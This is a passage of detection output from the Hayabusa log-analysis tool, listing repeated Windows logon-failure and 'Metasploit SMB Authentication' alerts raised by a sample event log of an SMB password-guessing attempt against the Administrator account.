Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j0Smqw4cA4wG2Q6m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.485 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KLWloOhUYEQlj6y6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Tuxuykh0j5afeTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.569 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.609 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aeXS6QwYhqJAOeuz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.609 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AqFSJCq5bmBW6dj1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DH1zyt1hxTgzajhW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.718 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.761 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rrZxcWjUX4OgYYIb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.761 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ExtkYXSJI8F41uvw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.807 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sLh1Q3RieOoukiCT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.881 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kNb2hZDxi4QrbQpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.881 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.923 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jCb1TMlFj2PjH2sA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.923 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rgF42C57Nx6F3HU3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.973 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KZfFH9geIrxVYowJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.005 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.039 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pWz1XeyxywR0o5gS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.039 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: og1kItEC6WhqXF37 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q0KhaJlD6tWwF2ky : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.121 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XUy0EKmjyD6ZYENA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.165 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h3MdGstPPFJDGzwG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.217 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VTs0ZQa6LGrKZKsY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.264 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FefzWjMXSvMdvqcw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.304 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.345 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlnUt9tPRSXR5mWs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.345 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dehb4M6pcxi56Bkl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.384 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tLXHvGiUqZyxax4W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bP1gKcf1eeKm0RB1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ldbN1odP77n0BOzO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: drRC8qCbPe5e4mdR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.562 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.607 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lBg39AUtzZi6Q4iz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.607 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: huv5YEPo1n7UiFkq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.650 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9CLLwao1NDtBulxs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SB88EHHhDWhvJI87 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VtBvklueV4MZo3pJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.782 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: noha7Vw85VfURHik : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wl5eIYvoKpJGUcSl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bsS3JTLUWcFYvxAE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gjM6hj2bGxC124oZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.957 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3IQkVcY5iMTxCRN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.005 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v44Kp3lpGKb6Xd4j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.045 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.082 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7e1skdEmGlXbzUWk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.082 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: feaA6lAxWjapFbAW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.181 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IJZjTqY5innWcvSZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ymXIp0KTw0vIbB0N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.273 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZpPJEcLv7BoZaQwT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cz14Cv861RhFh0Pa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H8BklDHdS0cdcbGu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0m5Mznl2khRMj31V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ha6TuN7C8V0roSAK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.472 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9oBW0yE5a9zSkpIH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.517 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 